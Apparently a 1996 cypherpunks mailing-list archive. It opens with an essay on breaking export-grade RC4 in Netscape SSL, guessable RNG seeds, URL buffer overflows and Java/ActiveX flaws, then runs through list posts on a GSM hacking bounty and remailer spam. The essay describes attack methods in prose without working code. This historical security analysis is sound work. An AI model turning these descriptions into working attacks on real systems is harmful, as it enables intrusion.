95, Windows NT, and Access, Apple's AOCE, and Oracle Secure SQL. The main criticism of SSL (apart from a few protocol flaws which were fixed in later versions) was the fact that RC4 used a key of only 40 bits, making it susceptible to a brute-force attack. The reason for the 40-bit key and (according to RSADSI, the company that developed RC4) the reason why details on it were kept secret was that these conditions were required under an agreement between the Software Publishers Association (SPA) and the US government which gave special export status to the RC4 algorithm and a companion algorithm called RC2. Implementations of RC2 and RC4 which are restricted to a 40-bit key get automatic export approval provided the implementations work correctly with a set of test vectors supplied by the NSA. Provided the results are as expected, export approval is granted within a week. The weakness of the encryption in US-exportable SSL implementations even led the French government, which normally bans all non-government-approved use of encryption (the "decret du 18 avril 1939" defines 8 categories of arms and munitions from the most dangerous (1st category) to the least dangerous (8th category), the "decret 73-364 du 12 mars 1973" specifies that encryption belongs to the second category, and the "loi 90-1170 du 29 decembre 1990" states that use of encryption equipment must be approved by the French government), to approve the use of Netscape in France [Vincent-Carrefour 1996], presumably because the French government has no problems in breaking it. The first step in attacking SSL was to find out how RC4 worked. Since it was in widespread use, it was only a matter of time before someone picked the code apart and published the algorithm. RSADSI sell a cryptographic toolkit called BSAFE [BSAFE 1994] which contains RC4, and this seems a likely source for the code (the Windows password encryption code is also a good source, and the algorithm can be extracted in an hour or two). The results were posted to mailing lists and the Internet [Anon 1994a]. Someone with a copy of BSAFE tested it against the real thing and verified that the two algorithms produced identical results [Rescorla 1994], and someone else checked with people who had seen the original RC4 code to make sure that it had been (legally) reverse-engineered rather than (illegally) copied [Anon 1994b]. The RC2 code was disclosed in a similar manner in 1996, but after problems with legal threats during the RC4 disclosure process it was handled more formally: First an RC2 implementation was reverse-engineered [Anon 1996], then a specification for the algorithm was written based on the reverse-engineered code [Gutmann 1996], and finally a new implementation based on the specification was written by someone who had never seen the reverse-engineered RC2 code [Vogelheim 1996]. No legal threats were ever issued over RC2. The RC4 code was immediately subject to intense analysis in various cryptography-related fora. RC4 has two parts, the initialization phase, and the random number generation phase used for the encryption itself. An array is initialized to be a random permutation using the user's key. The random number generator then mixes the permutation and reports values looked up pseudorandomly in that permutation. Among various RC4 problems which were discussed are that the likelihood that during the initialization phase small values will remain in small positions in the initial permutation is too high; user keys are repeated to fill 256 bytes, so 'aaaa' and 'aaaaa' produce the same permutation; results are looked up at pseudorandom positions in the array, and if some internal state causes a certain sequence of positions to be looked up, there are 255 similar internal states that will look up values in the same sequence of positions (although the values in those positions will be different), from which it can be shown that cycles come in groups of 2^n, where all cycles in a group have the same length, and all cycles are of an odd length * 256 unless they are in a group of 256; there is a bias in the results so that, for example, the pattern "a a" is too likely and the pattern "a b a" is too unlikely, which can be detected only after examining about 8 trillion bytes; the internal state is not independent of the results, so that with a given result there are two patterns in the internal state that appear 1/256 times more often than they ought to; at least two seperate methods exist for deducing the internal state from the results in around 2^900 steps; and under certain special circumstances the initial byte of the pseudo-random stream generated by RC4 is strongly correlated with only a few bytes of the key. All of these "weaknesses" except for the last one are purely theoretical in nature, and even the last one can only occur under special circumstances (it doesn't affect SSL implementations since they hash the key with MD5 rather than using it directly, which avoids the problem). Overall, the cryptographic community agreed that RC4, when used correctly, was a sound cipher. Unfortunately, due to the US export restrictions, RC4 couldn't be used correctly. Although Netscape negotiated a 128-bit key to protect each session, it sent 88 of those 128 bits in the clear so that only 40 bits of the key were actually kept secret. Now that RC4 was known, SSL became a prime target for attack. An initial attempt at breaking RC4 was made in July 1995 using encrypted data from a Microsoft Access database [Back 1995a]. This attempt involved 89 contributors and took about a week using idle computing time on workstations and PC's, with around 80% of the work being done by the top 19 contributors. Due to logistical problems, human error, and buggy software, the attempt ultimately failed, but the stage had been set for an attack on SSL. On 14 July 1995, an SSL challenge message containing an encrypted (fake) credit card order transmitted to one of Netscapes own computers was posted to mailing lists and the Internet by Hal Finney [Finney 1995a]. The challenge message was independantly broken by two groups, the first to announce success in breaking it was a French researcher using idle time on a collection of 120 computers and workstations over 8 days [Doligez 1995a] [Doligez 1995b]. The 40-bit secret part of the key was 7E F0 96 1F A6, and was found after scanning just over half the key space. The average search speed was about 850,000 keys/s, with a peak of 1,350,000 keys/s. A second group had broken it two hours earlier, but announced their success a day later [Back 1995b]. The event immediately attracted international media attention, including newspaper, radio, and television coverage (although many reports were rather garbled) in France [Munger 1995], Germany [Reif 1995b], Japan [NewsBytes 1995], the UK [Arthur 1995], and the US [Beck 1995] [Sandberg 1995]. A second challenge was posted on 19 August 1995 [Finney 1995b] and an attack by a `Brute Squad' of 201 Internet-connected volunteers began at 1800 GMT on 24 August 1995. The attack involved greatly improved software with automatic communication between client workstations attacking the encryption and a central server which doled out sections of keyspace to search [Brooks 1995]. This setup took 31.8 hours to find the key, 96 36 34 0D 46. Congestion on the server being used to coordinate the attack meant that most of the machines involved were idle for perhaps 3/4 of their available time, so in theory the attack could have been completed in only 8 hours. Both the client and server software was continually upgraded during the duration of the attack. The attacks, which used only unused processing capacity on the machines, were essentially "free", and could easily be mounted using the spare processing capacity available in companies, businesses, universities, and foreign governments. By breaking a brute-force attack into a number of independant sections, as many machines as are needed can be applied to the problem, so that each doubling of the amount of hardware applied to the problem halves the time required to find the solution. Although the total investment will have doubled, the cost per recovered key is kept constant since twice as many keys can now be found in the same time. Another possibility which has been suggested is the creation of an RC4-breaking screen saver for networked Windows machines which performs key searches during the (often prolonged) periods in which machines are left idle. One experiment in performing this kind of attack took 2 weeks using relatively slow 486/50's and Sparc 20's, with noone the wiser that the machines were being used overnight for this purpose [Young 1996]. Another attack involved a networked Windows screen saver where the client software was activated whenever a machine was otherwise idle and communicated its results to a central server on a network with around 100 PC's. By now, breaking the Netscape encryption had become a kind of processor benchmark, with one manufacturer rating the speed of their system based on how long it took to break RC4 - 8 hours on one computer [ICE 1996]. Further improvements to the attack were proposed. The most important one was to move from attacking one message at a time to attacking entire collections of messages. Instead of generating a key and testing it against a single message, it could be tested against 100 messages, so that in average one key could be found in 1/100th the time it took for a single message. Unfortunately in the case of SSL this wasn't possible, since although only 40 bits of key are kept secret, there are still a total of 128 unique key bits for each message, making it impossible to attack more than one message at a time. In effect the remaining 88 bits of key act as a `salt' in the same way the Unix password salt works. However a more simplistic implementation which uses only 40 bits of key could be attacked in this manner. The attacks on RC4 are a prime example of a publicity attack. They were carried out by volunteers using borrowed machine time, noone (apart from Netscapes stock prices) was harmed, and they achieved a great deal of publicity. The intended goal - of proving that the restricted encryption allowed by the US government could be broken - was achieved. This fuelled intense debate within the US about the need to lift the export restrictions in order to facilitate electronic commerce. Virtually every article covering the encryption debate would eventually refer to the ease with which the 40-bit keys of the form used in SSL could be broken (see for example [Ante 1996]). The fact that it was completely uneconomical to mount a criminal attack on 40-bit SSL keys was mostly ignored (except in Netscape press releases). The enthusiasm for Internet commerce, especially commerce protected by SSL, was severely dented, and companies began to adopt a more cautious attitude in deploying commercial services over the net. [Anon 1994a] `David Sterndark' (an alias), "RC4 Algorithm revealed", posting to sci.crypt newsgroup, message-ID , 14 September 1994. [Anon 1994b] Anonymous, "`Alleged RC4' not real RSADSI code", posting to sci.crypt newsgroup, message-ID <9409250900.AA17035 at ds1.wu-wien.ac.at>, 25 September 1994. [Anon 1996] Anonymous, "RC2 source code", posting to sci.crypt newsgroup, message-ID <4ehmfs$6nq at utopia.hacktic.nl>, 29 January 1996. [Ante 1996] Spence Ante, "Everything You Ever Wanted To Know About Cryptography Legislation. . .(But Were Too Sensible to Ask)", PC World, May 1996. [Arthur 1995] Charles Arthur, "Internet's 30bn Pound Secret Revealed", UK Indpendent, 17 August 1995. [Back 1995a] Adam Back, "Announce: Brute force of RC4, 40 bits all swept", posting to sci.crypt newsgroup, message-ID , 20 July 1995. [Back 1995b] Adam Back, "Another SSL breakage...",. posting to cypherpunks mailing list, 17 August 1995. [Beck 1995] Alan Beck, "Netscape's Export SSL Broken by 120 Workstations and One Student", HPCwire, 22 August 1995. [Benaloh 1995] Josh Benaloh, Butler Lampson, Daniel Simon, Terence Spies, and Bennet Yee, "The Private Communication Technology Protocol (PCT)", Microsoft Corporation, October 1995. [Brooks 1995] Piete Brooks, "Cypherpunks `brute' key cracking ring", http://www.brute.cl.cam.ac.uk/brute/. [BSAFE 1994] BSAFE 2.1 software, RSA Data Security Inc, 1994. [Doligez 1995a] Damien Doligez, "SSL challenge -- broken!", posting to sci.crypt newsgroup, message-ID <40sajr$sps at news-rocq.inria.fr>, 16 August 1995. [Doligez 1995b] Damien Doligez, "SSL challenge virtual press conference", http://pauillac.inria.fr/~doligez/ssl/press-conf.html. [Finney 1995a] Hal Finney, "SSL RC4 Challenge", posting to sci.crypt newsgroup, message-ID <3u6kmg$pm4 at jobe.shell.portal.com>, 14 July 1995. [Finney 1995b] Hal Finney, "SSL Challenge #2", posting to cypherpunks mailing list, message-ID <199508191525.IAA16294 at jobe.shell.portal.com>, 19 August 1995. [Gutmann 1996] Peter Gutmann, "Specification for Ron Rivests Cipher No.2", posting to sci.crypt newsgroup, message-ID <4fk39f$f70 at net.auckland.ac.nz>, 11 February 1996. [Hallam-Baker 1996] Phill Hallam-Baker, "A problem with Navigator's cache -Reply", posting to www-security mailing list, 25 August 1996. [ICE 1996] Integrated Computing Engines, "MIT Student Uses ICE Graphics Computer To Break Netscape Security in Less Than 8 Days", 10 January 1996. [Munger 1995] Benoit Munger, "Cachez ces mots que je ne saurais lire", Le Devoir, 28 August 1995. [NewsBytes 1995] "Netscape Encrypted Data Cracked", NewsBytes, Tokyo, Japan, 18 August 1995. [Sandberg 1995] Jared Sandberg, "French Hacker Cracks Netscape Code, Shrugging Off U.S. Encryption Scheme", The Wall Street Journal, 17 August 1995, p.B3. [Reif 1995a] Holger Reif, "Netz ohne Angst: Sicherheitsrisiken des Internet", c't Magazine, September 1995, p.174. [Reif 1995b] Holger Reif, "Peinliche Panne: Netscape gibt ernsthafte Sicherheitslu"cken zu", c't Magazine, November 1995, p.26. [Rescorla 1994] Eric Rescorla, "RC4 compatibility testing", posting to cypherpunks mailing list, message-Id <9409140137.AA17743 at eitech.eit.com>, 13 September 1994. [Trei 1995] Peter Trei, "Netscape's SSL security has been compromised", posting to comp.security.misc newsgroup, message-ID <40t4ti$b8s at iii1.iii.net>, 16 August 1995. [Vincent-Carrefour 1996] Jacques Vincent-Carrefour, "Autorisation de fourniture et d'utilisation generale de moyens de cryptologie No.2500", 509/DISSI dossier numero 950038, 7 November 1995. [Vogelheim 1996] Daniel Vogelheim, "RRC.2 implementation available", posting to sci.crypt newsgroup, message-ID <4g5u20$e4k at news.rwth-aachen.de>, 19 February 1996. [Young 1996] Eric Young, "Bank transactions on Internet", posting to cypherpunks mailing list, message-ID , 9 April 1996. (In)Secure Internet Electronic Commerce --------------------------------------- After the RC4 attacks, researchers looked for other weaknesses in Netscape. In September 1995 it was discovered that Netscape didn't check the amount of input it was fed, leading to internal buffers being overrun [Green 1995] [Neumann 1995]. This bug also existed in other browsers such as Mosaic and IBM's WebExplorer. By carefully adjusting the data fed to the browser, it was possible to force a victims PC to execute arbitrary code simply by selecting a URL. This problem has occurred in the past in a number of other programs such as fingerd (where it was exploited by the Internet worm [Spafford 1988]), the CERN and NCSA httpd's (as explained below in the section [!!!!]), and recently splitvt, syslog, and mount/umount, leading one exasperated mailing-list moderator to wonder how many more times he'd see this problem [Bloodmask 1996]. The flaw in question can be exploited by ensuring that the code to be executed is located in the URL at a point where it overflows the end of the buffer. A URL can contain almost any data value except for a few characters which have special significance and a binary zero, a restriction which can easily be bypassed by selecting alternative encodings for any instructions which cause problems. The browser stack looks as follows: [Diagram: URL buffer, other data, callers saved program counter] It is therefore possible, by making the URL long enough to overwrite the other data and saved program counter, to force a jump to an attackers code rather than returning to the calling routine, allowing an attacker to force the execution of arbitrary code on the victims machine. Although this exploit is machine and browser-specific, by targetting the most common architecture (Windows on an Intel processor) and browser (Netscape), a reasonable chance of success can be obtained. At about the same time the stack overwrite problem was discovered, a basic flaw was found in Netscape's SSL implementation which reduced the time to break the encryption from hours to minutes. Despite an existing body of literature covering the need for carefully selected random-number generation routines for cryptographic applications [Eastlake 1994] [IEEE 1995] [Robertson 1995], one of which even included ready-to-use code [Plumb 1994], Netscape used fairly simple methods which resulted in easy-to-guess encryption keys [Goldberg 1995] [Goldberg 1996]. It was found that, under Unix, Netscape used a combination of the current time in seconds and microseconds and the process ID of the current and parent process to initialise the random number generator which produced master encryption keys. The time can be determined to a reasonable degree of accuracy from the message being sent, the process ID's can be determined using standard Unix utilities (by people using the same machine that Netscape is running on), or by using other tricks such as the fact the an approximate process ID can often be obtained by observing the output of other network-related programs on the machine, and the parent process ID is often 1 (for example when Netscape is started from an X-windows menu) or close to the process ID. Under Windows the implementation was similarly flawed. The resulting number of values to search are smaller than the number of combinations in a 40-bit key, and much smaller than the number of combinations in the 128-bit key in the export-restricted version. Since Netscape never reseeds its internal random number generator, subsequent connections are relatively easy to break once the first one is broken. The researchers who discovered this problem released a program, unssl [unssl 1995] which would break Netscape's encryption (both the weak exportable version and the strong export-restricted version) in about a minute on an average workstation. Although one of the researchers classed it as "a silly bug", it received large amounts of media attention, including front-page coverage in the New York Times [Markoff 1995] and coverage in the Wall Street Journal [Sandberg 1995] and Daily Telegraph [Uhlig 1995]. Attempts to fix this problem introduced yet more problems. Under Windows the browser and server code, which appear to share the same random number code, don't close some of the file handles they use. While this has no serious effect on the client software (which doesn't run over extended periods of time), it does effect the server, which after a period of time runs out of file handles so that a number of calls related to gathering random data (some of them not apparently file-related) quietly fail, significantly weakening the random-number generation process [RingZero 1995]. The problem of insecure random number generation was not unique to Netscape, and has in the past beset XDM (which generates weak xauth keys), Netrek (a network game which generates guessable RSA private keys), an earlier version of the SecuDE security toolkit (which again generated guessable RSA keys), and Sesame (a european Kerberos clone) which uses it to generate DES keys. Significant security holes are also opened up through the use of Java, which allows arbitrary programs downloaded from the net to run in a (supposedly) controlled environment on a host PC. By breaking out of this controlled environment, Java applets can act as trojan horse programs on the PC, bypassing normal security measures. The consequences of these security problems have been widely reported and include the destruction of data [Clark 1996], the ability to access arbitrary files on the system [Felten 1996b], the ability to forward sensitive information to arbitrary machines on the net (bypassing firewalls and similar measures, since the "attack" comes from a trusted machine inside the security perimeter) [Williams 1996] [Markoff 1996], or even run arbitrary native code on the machine [Felten 1996a] [Hopwood 1996] [Kennedy 1996]. This last class of flaws are the most serious, since they allow any code to be executed on a victims machine. The problem was in the class loading code for the browser and affected all then available browsers rather than just Netscape, and could be carried out simply by a victim viewing a web page containing the hostile Java applet. Java problems can be combined with other attacks such as DNS spoofing (in which a fake address for a target machine is advertised), allowing a Java applet to connect to a normally disallowed target machine since the Java security manager thinks it is connecting to a safe system [Mueller 1996]. Other problems are less subtle, and can crash the browser (and, under some versions of Windows, the operating system as well) simply by connecting to a web page [Ref: Browser-crashing pages]. One report comes to the conclusion that "because of the wonderful power of the Java language, security problems are likely to continue" [Neumann 1996]. These problems are not unique to Java. Microsoft's ActiveX has experienced similar troubles, exemplified by a sample application which shuts down the machine, and even turns off the power on systems which support this functionality [McLain 1996]. The problems extend beyond Java and ActiveX to other kinds of embedded executable content as well. For example the ability to embed macros in documents viewed and downloaded by a browser, in combination with security holes in the browser, allows an attacker to execute arbitrary code on a victims system whenever they view the attackers web page [Felten 1996c]. Although this was subsequently fixed, the solution was to issue warnings for all local files as well as remote downloads, so that after the first dozen or so messages the user was likely to simply automatically click "OK" whenever another warning popped up [Walsh 1996]. In addition a hostile application could access the Windows registry (the system-wide database of configuration options) to quietly disable the warnings. This creates a nice niche for "espionage-enabling" viruses which disable or patch various security features in operating systems or application software to allow later attacks. At least one security organisation already uses such a program, a modified stealth virus, for this purpose. -> Mention that these are all seperate problems, not the same ref over and over. [Clark 1996] Don Clark, "Researchers Find Big Security Flaw In Java Language" The Wall Street Journal, 26 March 1996, p.B4. [Bloodmask 1996] `Bloodmask', "Vulnerability in ALL linux distributions", posting to linux-alert mailing list, 30 July 1996. [Eastlake 1994] Donald Eastlake, Stephen Crocker, Jeffrey Schiller, "Randomness Recommendations for Security", RFC 1750, December 1994. [Felten 1996a] Ed Felten, "Security Flaw in Netscape 2.02", Risks-Forum Digest Vol.18, Issue 13, 17 May 1996. [Felten 1996b] Ed Felten, "Java security update", Risks-Forum Digest, Vol.18, Issue 32, 13 August 1996. [Felten 1996c] Ed Felten "Internet Explorer Security Problem", Risks-Forum Digest, Vol.18, Issue 36, 21 August 1996. [Goldberg 1995] Ian Goldberg, "Netscape SSL implementation cracked!", posting to cypherpunks mailing list, message-ID: <199509180441.VAA16683 at lagos.CS.Berkeley.EDU>, 18 September 1995. [Goldberg 1996] Ian Goldberg and David Wagner, "Randomness and the Netscape Browser", Dr.Dobbs Journal, January 1996, p.66. [Green 1995] Heather Green, "Netscape Says Hackers Uncover 3rd Flaw in Its Internet Software", The New York Times, 25 Sep 1995. [Hopwood 1996] David Hopwood, "Another Java security bug", posting to comp.lang.java newsgroup, message-ID <4orf1q$t6f at news.ox.ac.uk>, 2 June 1996. [IEEE 1995] IEEE P1363 Appendix E, "Cryptographic Random Numbers", Draft version 1.0, 11 November 1995. [Kennedy 1996] David Kennedy, "Another Netscape Bug US$1K", Risks-Forum Digest, Vol.18, Issue 1422, May 1996. [Markoff 1995] John Markoff, "Security Flaw Is Discovered In Software Used in Shopping", The New York Times, 19 September 1995, p.A1. [Markoff 1996] John Markoff, "New Netscape Software Flaw Is Discovered", The New York Times, 18 May 1996, p.31. [McLain 1996] Fred McLain, "ActiveX, or how to put nuclear bombs in web pages", http://www.halcyon.com/mclain/ActiveX/. [Mueller 1996] Marianne Mueller, "Java security", Risks-Forum Digest, Vol.17, Issue 79 23 February 1996. [Neumann 1995] Peter Neumann, "Third Netscape weakness found", Risks-Forum Digest, Vol.17, Issue 36, 27 September 1995. [Neumann 1996] Peter Neumann, "More Java, JavaScript, and Netscape problems", in "Security Risks in Computer-Communication Systems", ACM SIGSAC Review, Vol.14, No.3 (July 1996), p.22. [Plumb 1994] Colin Plumb, "Truly Random Numbers", Dr.Dobbs Journal, November 1994, p.113. [RingZero 1995] `RingZero', "NEW Netscape RNG hole", posting to cypherpunks mailing list, message-ID <9510080732.AA14015 at anon.penet.fi>, 8 October 1995. [Robertson 1995] Richard Robertson, "Random Number Generators Draft", IEEE P1363 Random Number Generators Review Group, May 1995. [Sandberg 1995] Jared Sandberg, "Netscape's Internet Software Contains Flaw That Jeopardizes Security of Data", The Wall Street Journal, 19 September 1995. [Spafford 1988] Gene Spafford, "The Internet Worm: Crisis and Aftermath", Communications of the ACM, Vol.32, No.6 (June 1989), p.678. [Uhlig 1995] Robert Uhlig, "Security threat to Internet shopping", Daily Telegraph, Daily Telegraph (paper edition), 3 October 1995, p.12. [unssl 1995] ftp://ftp.csua.berkeley.edu/pub/cypherpunks/cryptanalysis/unssl.c. [Walsh 1996] Mike Walsh, "Microsoft's warning", Risks-Forum Digest, Vol.18, Issue 38, 26 August 1996 [Williams 1996] Eric Williams, "New Netscape 2.0/2.01 Security Issue (Java Sockets)", posting to comp.lang.java newsgroup, message-ID <4jppdt$ake at sky.net>, 1 April 1996. [WSJ 1996] The Wall Street Journal, "Princeton Team Finds Bug In Part Of Netscape Program", 20 May 1996. From frantz at netcom.com Wed Sep 11 14:54:19 1996 From: frantz at netcom.com (Bill Frantz) Date: Thu, 12 Sep 1996 05:54:19 +0800 Subject: (Fnord) Edupage, 10 September 1996 Message-ID: <199609111822.LAA15291@netcom7.netcom.com> I'm preaching to the choir, but I can't resist. >From Edupage, 10 September 1996: >A leading Clinton Administration official ... Michael Nelson, who adds >that organized crime members are already some of the most sophisticated >users of computer systems and strong encryption technology. In addition, >computer crackers will pose a more significant threat. The bad guys already have strong encryption. So why doesn't the Clinton administration immediately press for the widespread deployment of strong encryption to help defend us against the bad guys? ------------------------------------------------------------------------- Bill Frantz | "Lone Star" - My personal | Periwinkle -- Consulting (408)356-8506 | choice for best movie of | 16345 Englewood Ave. frantz at netcom.com | 1996 | Los Gatos, CA 95032, USA From roger at coelacanth.com Wed Sep 11 15:16:02 1996 From: roger at coelacanth.com (Roger Williams) Date: Thu, 12 Sep 1996 06:16:02 +0800 Subject: Hacking Mobil Telephone System ? In-Reply-To: Message-ID: >>>>> Mark O Aldrich writes: > On Wed, 11 Sep 1996, Stephan Schmidt wrote: >> If a hacker is able to phone using the number >> 0171 / 3 28 99 66 in Germany with a hacked code, >> the company will pay 100.000 DM (~65.000$) to a non >> profit organisation of the hackers choice. > ... I'd also expect to get paid a hell of > a lot more than $65 for doing a penetration test on their network. Sixty > five bucks won't even pay the per diem, none the less a reasonable wage. Um, that's 65 *thousand* bucks, which should pay the per diem for a week or so... ;-) -- Roger Williams finger me for my PGP public key Coelacanth Engineering consulting & turnkey product development Middleborough, MA wireless * DSP-based instrumentation * ATE tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/ From zachb at netcom.com Wed Sep 11 16:23:24 1996 From: zachb at netcom.com (Z.B.) Date: Thu, 12 Sep 1996 07:23:24 +0800 Subject: Hacking Mobil Telephone System ? In-Reply-To: Message-ID: On Wed, 11 Sep 1996, Mark O. Aldrich wrote: > OK to phreak your phones - honest," I'd also expect to get paid a hell of > a lot more than $65 for doing a penetration test on their network. Sixty In Germany, the decimal point is used in place of the comma. So, 65.000$ would be $65,000 when you switch the notation to US figures. --- Zach Babayco zachb at netcom.com <----- finger for PGP public key http://www.geocities.com/SiliconValley/Park/4127 From um at c2.net Wed Sep 11 16:25:51 1996 From: um at c2.net (Ulf Moeller) Date: Thu, 12 Sep 1996 07:25:51 +0800 Subject: papers on anonymous protocols In-Reply-To: Message-ID: Wei Dai writes: > A. Pfitzmann, B. Pfitzmann, M. Waidner: ISDN-MIXes - Untraceable > Communication with Very Small Bandwidth Overhead; Proc. Kommunikation > in verteilten Systemen, Feb. 1991, Mannheim, Informatik-Fachberichte > 267, Springer-Verlag, Heidelberg 1991, 451-463. > >describes a protocol for anonymous telephone calls. The paper is at http://www.informatik.uni-hildesheim.de/FB4/Institute/Informatik/issi/sirene/publ/PfPW_91TelMixeGI_NTG.ps.gz From ghio at c2.net Wed Sep 11 16:51:01 1996 From: ghio at c2.net (Matthew Ghio) Date: Thu, 12 Sep 1996 07:51:01 +0800 Subject: 'robert' and his 'hipcrime' web site In-Reply-To: Message-ID: <199609111942.MAA18802@infinity.c2.org> Moltar Ramone wrote: > On Wed, 11 Sep 1996, John Anonymous MacDonald wrote: [snip] > > So basically this guy is a mathematician/artist trying > > to pretend he's an anarchist. > > Like... oh... I dunno... una-something... :-) To be an "anarchist" has > nothing to do with violence, necessarily, though. Ghandi was an > anarchist, of course, as are many other people (such as myself) who > disclaim violence as a tactic. > > > So we have a guy, probably with an education in mathematics, who likes > > abstract art. Not what would generally be considered a political figure. > > But there's something else there - something that doesn't want to be seen, > > something that is very strongly law&order, something that doesn't > > understand the anarchy of the net, and fears it. > > Disagree strongly. Are you aware of the source of the name 'hipcrime'? > It's from John Brunner's novel _Stand_On_Zanzibar_ (A _great_ book, btw), > and describes a cynical, hipster-societal dropout philosophy (or at least > style) that is inclined to look at people as no more than sheep. Applying > this to the 'net populace is perhaps (I hesitate somewhat to apply the > term) misanthropic, but not necessarily law & order. Again, unabomber > comparisons are obvious. I'm not so sure about that. I suspect in Kaczynski's case it was attention deficit disorder and/or severe depression that drove him out into the woods where no one would bother him - he didn't like interruptions and shunned visitors. Kaczynski blamed "leftists" and "technologists" for his ills and primarally (though not exclusively) took out his rage on them. This guy is just plain arrogent. He believes he's right, and if you don't agree with him and let him do whatever he wants, then to him you are unimportant scum. ("weak-minded soul" to quote him directly.) What I don't understand is, why he bothered attacking the remailers. Since he obviously knows how to forge mail headers and write unix cgi scripts, and he wasn't trying to conceal the source address, using the remailers did him no good. Also, he could have just downloaded the remailer software and run it. So maybe he really is Co$... From stewarts at ix.netcom.com Wed Sep 11 17:12:29 1996 From: stewarts at ix.netcom.com (stewarts at ix.netcom.com) Date: Thu, 12 Sep 1996 08:12:29 +0800 Subject: [WAS xs4all.nl] Terrorists Message-ID: <199609112015.QAA01913@attrh1.attrh.att.com> At 11:01 AM 9/9/96 +0200, Stephan wrote: >One thought : How many of you would support terrorist >web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ? But I _do_ support a terrorist web server! My taxes pay for CIA (odci.gov), whitehouse.gov, llnl.gov, *.mil, +1-888-ATF-FIRE .... # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From trei at process.com Wed Sep 11 17:19:07 1996 From: trei at process.com (Peter Trei) Date: Thu, 12 Sep 1996 08:19:07 +0800 Subject: Hacking Mobil Telephone System ? Message-ID: <199609111913.MAA16800@toad.com> > On Wed, 11 Sep 1996, Stephan Schmidt wrote: > > > The German Company MobilCom wants to proove > > that the German GSM networks D1,D2 and E+ are > > secure. > > > > > > > If a hacker is able to phone using the number > > 0171 / 3 28 99 66 in Germany with a hacked code, > > the company will pay 100.000 DM (~65.000$) to a non > > profit organisation of the hackers choice. > > > > Is someone able to do this ? :) > > While there's dubious wisdom in trying to tell Der Polizei, "I was just > responding to an authorization that I found on the Internet that says it's > OK to phreak your phones - honest," I'd also expect to get paid a hell of > a lot more than $65 for doing a penetration test on their network. Sixty > five bucks won't even pay the per diem, none the less a reasonable wage. > And Der Polizei is *NOT* known for having a sense of humor about anything, > at any time, with anyone. Remember, kids, they may look like shit in > uniform, but those automatic weapons they carry are real, so's the ammo, > and they know how to use both of 'em. The simple solution is to call the number from a regular phone, and find out if the offer is correct. I think you'll find that '100.000 DM (~65.000$)' is European nomenclature for '100,000 DM (~65,000$). The differences between US and European nomenclature can be subtle, yet important. Quick - which is likely to have had warmer weather: 1/8/96, or 8/1/96? Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From jbugden at smtplink.alis.ca Wed Sep 11 17:26:47 1996 From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca) Date: Thu, 12 Sep 1996 08:26:47 +0800 Subject: Hacking Mobil Telephone System ? Message-ID: <9608118424.AA842483607@smtplink.alis.ca> On Wed, 11 Sep 1996, Stephan Schmidt wrote: > If a hacker is able to phone using the number > 0171 / 3 28 99 66 in Germany with a hacked code, > the company will pay 100.000 DM (~65.000$) to a non > profit organisation of the hackers choice. "Mark O. Aldrich" wrote: >I'd also expect to get paid a hell of a lot more than $65 for doing a penetration test on their network. Then how about a thousand times more than $65 US ? When was the last time Cents/Pfennigs were denominated in 1000ths of a Dollar/Mark? Ahh, maybe you are from Italy? ;-) Ciao, James From admin at superhot.com Wed Sep 11 17:35:56 1996 From: admin at superhot.com (Admin) Date: Thu, 12 Sep 1996 08:35:56 +0800 Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam] Message-ID: <199609112124.PAA11039@rintintin.Colorado.EDU> >This is an absurd and inaccurate analogy. The mailBot simply pushes >*mailto:* tags that people have willingly placed on their public websites. >They invite the mail so a more accurate analogy would be that City Hall puts >up a public suggestion box and invites comments. The bot then puts one, and >only one, unsigned anonymous suggestion into the box. It then goes on to the >Art Gallery where they too have put up a public suggestion box, and the bot >places one, and only one, anonymous suggestion in that box also...and it >moves on to the next publicly accessable suggestion box that it finds, each >time putting in one, and only one, message. > >Can the College-aged mind these days not develop a rational, concise, >accurate and logical analogy that stays on point? > >Think about it... or take down the public suggestion boxes if one doesn't >like what one finds inside. If you invite feedback...it will come. > >admin > > >There is >> >>HipCrime wrote: >>> Be honest, all you really care about is something which >>> "threatens the existence" your little baby. >> >>I think you were referring to yourself, Robert. :) >> >> >>Since you don't seem to understand the concept of spam very well yet, >>try this little experiment: >> >>Go downtown to City Hall and post advertisements for your website on >>all the walls and doors. Be sure to put one on the Mayor's office and >>all the members of the City Council. If they complain, explain to them >>why they are weak-minded souls who can't remove unwanted messages. >> >>Go to the local art gallery and post your signs all over. Tell people >>that since your web site is an "art project", that you are posting EXACTLY >>on topic, to an "appropriate group". Ask, "So, what's your problem ?!?" >> >>Pass out survey forms. Ask people where they want to see advertisements. >>Go to these sites and spray-paint your http address. If people complain >>that you are "harassing" them, ask them why a whopping eighteen letters >>written on the wall is harassment. Tell them it's not *your* fault, >>that you're just doing what other people told you to. Explain how many >>trees you are saving by using spray-paint instead of paper. >> >>When the police handcuff you and take you away, complain that they are >>censoring you. Tell the judge that you want to sue the cops for violating >>your civil rights. While you're in jail, think about why what you did >>was wrong. <>________________Lowest_Priced_Long_Distance__________________<> ||Long Distance 9.9�/min |Helping hardworking people || ||9.9� Anytime, Anywhere in US! |like yourself pay the || ||Free sign-up, 6 second billing |lowest possible price for || ||http://www.superhot.com/phone |high quality LD service. || <>-----------------------1_303_692_5190------------------------<> From mpd at netcom.com Wed Sep 11 17:37:44 1996 From: mpd at netcom.com (Mike Duvos) Date: Thu, 12 Sep 1996 08:37:44 +0800 Subject: Child porn as thoughtcrime Message-ID: <199609111848.LAA28393@netcom11.netcom.com> Chuck Thompson writes: > The answer to the all the questions in the first set is > yes, in this country anyway, if they are interpreted by the > legal system as intending to incite illicit sexual acts, > fantasies or obsessions about children. The fantasies or > obsessions are assumed to lead to the illegal acts. The problem here is that they are "assumed" to do this as a matter of inerrant scripture, in spite of quite a bit of evidence indicating that this is not the case. It doesn't exactly send those under 18 a positive message about their bodies when it is suggested that capturing the slightest overt representation of their sexuality is a crime worthy of flaying and burning at the stake. I agree that persons should probably be protected from working as models or service providers in the commercial sex industry until they reach the age of majority. But the things that are being proposed these days look much more like an ideological purge of material relating to youthful sexuality than a serious attempt to protect children. The reasons given as justification are almost always overly vague. > Well, I'd say that anyone who benefits materially from the > distribution of child porn is exploiting either the > children, the pervert or both. The definition of "child porn" today is so excessively broad that it tramples on the notion of 